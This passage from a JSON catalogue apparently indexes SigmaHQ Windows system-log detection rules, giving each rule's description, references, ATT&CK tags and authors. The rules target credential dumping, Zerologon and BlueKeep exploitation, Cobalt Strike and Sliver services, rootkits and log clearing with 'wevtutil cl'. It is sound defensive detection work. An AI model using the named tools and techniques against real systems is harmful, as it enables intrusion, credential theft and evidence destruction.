- "filename": "win_system_krbrelayup_service_installation.yml",
- "author": "Sittikorn S, Tim Shelton",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode",
- "uuid": "bc2e25ed-b92b-4daa-b074-b502bdd1982b",
- "value": "Local Privilege Escalation Indicator TabTip",
- "meta": {
- "refs": [
- "https://github.com/antonioCoco/JuicyPotatoNG",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_lpe_indicators_tabtip.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1557.001"
- ],
- "creation_date": "2022/10/07",
- "filename": "win_system_lpe_indicators_tabtip.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the reporting of NTLMv1 being used between a client and server",
- "uuid": "e9d4ab66-a532-4ef7-a502-66a9e4a34f5d",
- "value": "NTLMv1 Logon Between Client and Server",
- "meta": {
- "refs": [
- "https://attack.mitre.org/techniques/T1550/002/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_lsasrv_ntlmv1.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1550.002",
- "attack.s0363"
- ],
- "creation_date": "2022/04/26",
- "filename": "win_system_lsasrv_ntlmv1.yml",
- "author": "Tim Shelton",
- "level": "low",
- "falsepositive": [
- "Environments that use NTLMv1"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects well-known credential dumping tools execution via service execution events",
- "uuid": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed",
- "value": "Credential Dumping Tools Service Execution - System",
- "meta": {
- "refs": [
- "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_mal_creddumper.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.execution",
- "attack.t1003.001",
- "attack.t1003.002",
- "attack.t1003.004",
- "attack.t1003.005",
- "attack.t1003.006",
- "attack.t1569.002",
- "attack.s0005"
- ],
- "creation_date": "2017/03/05",
- "filename": "win_system_mal_creddumper.yml",
- "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community",
- "level": "high",
- "falsepositive": [
- "Legitimate Administrator using credential dumping tool for password recovery"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation",
- "uuid": "843544a7-56e0-4dcc-a44f-5cc266dd97d6",
- "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - System",
- "meta": {
- "refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
- "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1134.001",
- "attack.t1134.002"
- ],
- "creation_date": "2019/10/26",
- "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml",
- "author": "Teymur Kheirkhabarov, Ecco, Florian Roth",
- "level": "critical",
- "falsepositive": [
- "Highly unlikely"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report",
- "uuid": "25b9c01c-350d-4b95-bed1-836d04a4f324",
- "value": "Moriya Rootkit - System",
- "meta": {
- "refs": [
- "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_moriya_rootkit.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.privilege_escalation",
- "attack.t1543.003"
- ],
- "creation_date": "2021/05/06",
- "filename": "win_system_moriya_rootkit.yml",
- "author": "Bhabesh Raj",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter",
- "uuid": "f14719ce-d3ab-4e25-9ce6-2899092260b0",
- "value": "NTFS Vulnerability Exploitation",
- "meta": {
- "refs": [
- "https://twitter.com/jonasLyk/status/1347900440000811010",
- "https://twitter.com/wdormann/status/1347958161609809921",
- "https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_ntfs_vuln_exploit.yml"
- ],
- "tags": [
- "attack.impact",
- "attack.t1499.001"
- ],
- "creation_date": "2021/01/11",
- "filename": "win_system_ntfs_vuln_exploit.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unlikely"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.",
- "uuid": "7b687634-ab20-11ea-bb37-0242ac130002",
- "value": "Windows Pcap Drivers",
- "meta": {
- "refs": [
- "https://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_pcap_drivers.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.credential_access",
- "attack.t1040"
- ],
- "creation_date": "2020/06/10",
- "filename": "win_system_pcap_drivers.yml",
- "author": "Cian Heasley",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.",
- "uuid": "18f37338-b9bd-4117-a039-280c81f7a596",
- "value": "Zerologon Exploitation Using Well-known Tools",
- "meta": {
- "refs": [
- "https://www.secura.com/blog/zero-logon",
- "https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml"
- ],
- "tags": [
- "attack.t1210",
- "attack.lateral_movement"
- ],
- "creation_date": "2020/10/13",
- "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml",
- "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community",
- "level": "critical",
- "falsepositive": "No established falsepositives",
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects powershell script installed as a Service",
- "uuid": "a2e5019d-a658-4c6a-92bf-7197b54e2cae",
- "value": "PowerShell Scripts Installed as Services",
- "meta": {
- "refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_powershell_script_installed_as_service.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1569.002"
- ],
- "creation_date": "2020/10/06",
- "filename": "win_system_powershell_script_installed_as_service.yml",
- "author": "oscd.community, Natalia Shornikova",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects QuarksPwDump clearing access history in hive",
- "uuid": "39f919f3-980b-4e6f-a975-8af7e507ef2b",
- "value": "QuarksPwDump Clearing Access History",
- "meta": {
- "refs": [
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_quarkspwdump_clearing_hive_access_history.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.002"
- ],
- "creation_date": "2017/05/15",
- "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml",
- "author": "Florian Roth",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services",
- "uuid": "66bfef30-22a5-4fcd-ad44-8d81e60922ae",
- "value": "Rare Service Installations",
- "meta": {
- "refs": [
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_rare_service_installs.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.privilege_escalation",
- "car.2013-09-005",
- "attack.t1543.003"
- ],
- "creation_date": "2017/03/08",
- "filename": "win_system_rare_service_installs.yml",
- "author": "Florian Roth",
- "level": "low",
- "falsepositive": [
- "Software installation",
- "Software updates"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708",
- "uuid": "aaa5b30d-f418-420b-83a0-299cb6024885",
- "value": "Potential RDP Exploit CVE-2019-0708",
- "meta": {
- "refs": [
- "https://github.com/zerosum0x0/CVE-2019-0708",
- "https://github.com/Ekultek/BlueKeep",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_rdp_potential_cve_2019_0708.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.t1210",
- "car.2013-07-002"
- ],
- "creation_date": "2019/05/24",
- "filename": "win_system_rdp_potential_cve_2019_0708.yml",
- "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)",
- "level": "medium",
- "falsepositive": [
- "Bad connections or network interruptions"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.",
- "uuid": "530a6faa-ff3d-4022-b315-50828e77eef5",
- "value": "Anydesk Remote Access Software Service Installation",
- "meta": {
- "refs": [
- "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_anydesk.yml"
- ],
- "tags": [
- "attack.persistence"
- ],
- "creation_date": "2022/08/11",
- "filename": "win_system_service_install_anydesk.yml",
- "author": "Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "Legitimate usage of the anydesk tool"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects PsExec service installation and execution events (service and Sysmon)",
- "uuid": "d26ce60c-2151-403c-9a42-49420d87b5e4",
- "value": "Hacktool Service Registration or Execution",
- "meta": {
- "refs": [
- "Internal Research",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_hacktools.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1569.002",
- "attack.s0029"
- ],
- "creation_date": "2022/03/21",
- "filename": "win_system_service_install_hacktools.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects a Mesh Agent service installation. 
Mesh Agent is used to remotely manage computers", - "uuid": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", - "value": "Mesh Agent Service Installation", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_mesh_agent.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/11/28", - "filename": "win_system_service_install_mesh_agent.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use of the tool" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects NetSupport Manager service installation on the target system.", - "uuid": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", - "value": "NetSupport Manager Service Install", - "meta": { - "refs": [ - "http://resources.netsupportsoftware.com/resources/manualpdfs/nsm_manual_uk.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_netsupport_manager.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/10/31", - "filename": "win_system_service_install_netsupport_manager.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use of the tool" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects PAExec service installation", - "uuid": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", - "value": "PAExec Service Installation", - "meta": { - "refs": [ - "https://www.poweradmin.com/paexec/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_paexec.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2022/10/26", - "filename": 
"win_system_service_install_paexec.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", - "uuid": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", - "value": "New PDQDeploy Service - Server Side", - "meta": { - "refs": [ - "https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_pdqdeploy.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2022/07/22", - "filename": "win_system_service_install_pdqdeploy.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use of the tool" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", - "uuid": "b98a10af-1e1e-44a7-bab2-4cc026917648", - "value": "New PDQDeploy Service - Client Side", - "meta": { - "refs": [ - "https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_pdqdeploy_runner.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2022/07/22", - "filename": "win_system_service_install_pdqdeploy_runner.yml", - "author": "Nasreddine Bencherchali", - "level": 
"medium", - "falsepositive": [ - "Legitimate use of the tool" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects PsExec service installation and execution events (service and Sysmon)", - "uuid": "42c575ea-e41e-41f1-b248-8093c3e82a28", - "value": "PsExec Service Installation", - "meta": { - "refs": [ - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://jpcertcc.github.io/ToolAnalysisResultSheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_psexec.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ], - "creation_date": "2017/06/12", - "filename": "win_system_service_install_psexec.yml", - "author": "Thomas Patzke", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Remote Utilities Host service installation on the target system.", - "uuid": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", - "value": "Remote Utilities Host Service Install", - "meta": { - "refs": [ - "https://www.remoteutilities.com/support/kb/host-service-won-t-start/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_remote_utilities.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/10/31", - "filename": "win_system_service_install_remote_utilities.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use of the tool" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", - "uuid": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", - "value": "Sliver C2 Default Service Installation", - "meta": { - 
"refs": [ - "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231", - "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_sliver.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" - ], - "creation_date": "2022/08/25", - "filename": "win_system_service_install_sliver.yml", - "author": "Florian Roth, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", - "uuid": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", - "value": "New Service Uses Double Ampersand in Path", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_susp_double_ampersand.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2022/07/05", - "filename": "win_system_service_install_susp_double_ampersand.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a TacticalRMM service installation. 
Tactical RMM is a remote monitoring & management tool.", - "uuid": "4bb79b62-ef12-4861-981d-2aab43fab642", - "value": "TacticalRMM Service Installation", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_tacticalrmm.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/11/28", - "filename": "win_system_service_install_tacticalrmm.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use of the tool" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", - "uuid": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", - "value": "DHCP Server Loaded the CallOut DLL", - "meta": { - "refs": [ - "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", - "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", - "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2017/05/15", - "filename": "win_system_susp_dhcp_config.yml", - "author": "Dimitrios Slamaris", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", - "uuid": "75edd3fd-7146-48e5-9848-3013d7f0282c", - "value": "DHCP Server Error Failed Loading the CallOut DLL", - "meta": { - "refs": [ - 
"https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", - "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", - "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config_failed.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2017/05/15", - "filename": "win_system_susp_dhcp_config_failed.yml", - "author": "Dimitrios Slamaris, @atc_project (fix)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "One of the Windows Core Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", - "uuid": "100ef69e-3327-481c-8e5c-6d80d9507556", - "value": "System Eventlog Cleared", - "meta": { - "refs": [ - "https://twitter.com/deviouspolack/status/832535435960209408", - "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_eventlog_cleared.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" - ], - "creation_date": "2022/05/17", - "filename": "win_system_susp_eventlog_cleared.yml", - "author": "Florian Roth, Tim Shelton", - "level": "high", - "falsepositive": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", - "uuid": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", - "value": "ProcessHacker Privilege Elevation", - "meta": { - 
"refs": [ - "https://twitter.com/1kwpeter/status/1397816101455765504", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_proceshacker.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" - ], - "creation_date": "2021/05/27", - "filename": "win_system_susp_proceshacker.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", - "uuid": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", - "value": "RTCore Suspicious Service Installation", - "meta": { - "refs": [ - "https://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_rtcore64_service_install.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/08/30", - "filename": "win_system_susp_rtcore64_service_install.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers", - "uuid": "839dd1e8-eda8-4834-8145-01beeee33acd", - "value": "SAM Dump to AppData", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_sam_dump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ], - "creation_date": "2018/01/27", - "filename": "win_system_susp_sam_dump.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - 
"logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious service installation commands", - "uuid": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", - "value": "Suspicious Service Installation", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" - ], - "creation_date": "2022/03/18", - "filename": "win_system_susp_service_installation.yml", - "author": "pH-T", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects service installation in suspicious folder appdata", - "uuid": "5e993621-67d4-488a-b9ae-b420d08b96cb", - "value": "Service Installation in Suspicious Folder", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_folder.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" - ], - "creation_date": "2022/03/18", - "filename": "win_system_susp_service_installation_folder.yml", - "author": "pH-T", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects service installation with suspicious folder patterns", - "uuid": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", - "value": "Service Installation with Suspicious Folder Pattern", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_folder_pattern.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" - ], - 
"creation_date": "2022/03/18", - "filename": "win_system_susp_service_installation_folder_pattern.yml", - "author": "pH-T", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious service installation scripts", - "uuid": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", - "value": "Suspicious Service Installation Script", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_script.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" - ], - "creation_date": "2022/03/18", - "filename": "win_system_susp_service_installation_script.yml", - "author": "pH-T", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Windows Update get some error Check if need a 0-days KB", - "uuid": "13cfeb75-9e33-4d04-b0f7-ab8faaa95a59", - "value": "Windows Update Error", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_system_update_error.yml" - ], - "tags": [ - "attack.impact", - "attack.resource_development", - "attack.t1584" - ], - "creation_date": "2021/12/04", - "filename": "win_system_susp_system_update_error.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. 
Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server", - "uuid": "52a85084-6989-40c3-8f32-091e12e17692", - "value": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", - "meta": { - "refs": [ - "https://packetstormsecurity.com/files/166692/Windows-User-Profile-Service-Privlege-Escalation.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/08/16", - "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml", - "author": "Cybex", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "uuid": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", - "value": "Service Installed By Unusual Client - System", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_system_service_installation_by_unusal_client.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ], - "creation_date": "2022/09/15", - "filename": "win_system_system_service_installation_by_unusal_client.yml", - "author": "Tim Rauch", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "system", - "logsource.product": "windows" - } - }, - { - "description": "Well-known TAP software installation. 
Possible preparation for data exfiltration using tunnelling techniques", - "uuid": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", - "value": "Tap Driver Installation", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_tap_driver_installation.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048" - ], - "creation_date": "2019/10/24", - "filename": "win_system_tap_driver_installation.yml", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate OpenVPN TAP insntallation" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects volume shadow copy mount via windows event log", - "uuid": "f512acbf-e662-4903-843e-97ce4652b740", - "value": "Volume Shadow Copy Mount", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_volume_shadow_copy_mount.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ], - "creation_date": "2020/10/20", - "filename": "win_system_volume_shadow_copy_mount.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", - "level": "low", - "falsepositive": [ - "Legitimate use of volume shadow copy mounts (backups maybe)." 
